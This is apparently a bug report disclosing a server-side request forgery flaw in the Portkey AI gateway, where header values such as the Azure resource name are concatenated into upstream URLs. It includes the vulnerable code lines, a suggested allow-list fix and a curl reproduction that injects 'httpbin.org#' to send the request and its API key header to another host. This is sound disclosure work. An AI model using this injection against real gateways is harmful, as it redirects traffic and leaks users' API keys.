bug: SSRF via URL fragment injection in provider URL construction

[akhilesharora]

What Happened?

Provider URL components like resourceName and vertexRegion are concatenated directly into fetch URLs without validation. A # in the value breaks the URL structure - the part after # becomes a fragment, so the hostname resolves to whatever comes before it.

x-portkey-azure-resource-name: httpbin.org# builds https://httpbin.org#.openai.azure.com/openai, which hits httpbin.org instead of Azure. The api-key header goes with it.

Affected fields:

• resourceName (x-portkey-azure-resource-name) - hostname injection
• vertexRegion (x-portkey-vertex-region) - hostname injection
• vertexProjectId (x-portkey-vertex-project-id) - path injection

What Should Have Happened?

These values should be validated before URL construction. Only alphanumeric characters, hyphens, and dots should be allowed.

Relevant Code Snippet

// src/providers/azure-openai/api.ts:15
return `https://${resourceName}.openai.azure.com/openai`;

// src/providers/google-vertex-ai/api.ts:65
return `https://${vertexRegion}-aiplatform.googleapis.com`;

Repro:

npm run dev:node

curl http://localhost:8787/v1/chat/completions \
  -H "content-type: application/json" \
  -H "x-portkey-provider: azure-openai" \
  -H "x-portkey-azure-resource-name: httpbin.org#" \
  -H "x-portkey-azure-deployment-id: gpt-4" \
  -H "x-portkey-azure-api-version: 2024-01-01" \
  -H "x-portkey-api-key: test-key" \
  -d '{"model":"gpt-4","messages":[{"role":"user","content":"hi"}]}'

# Returns 405 from httpbin.org - gateway connected to the wrong host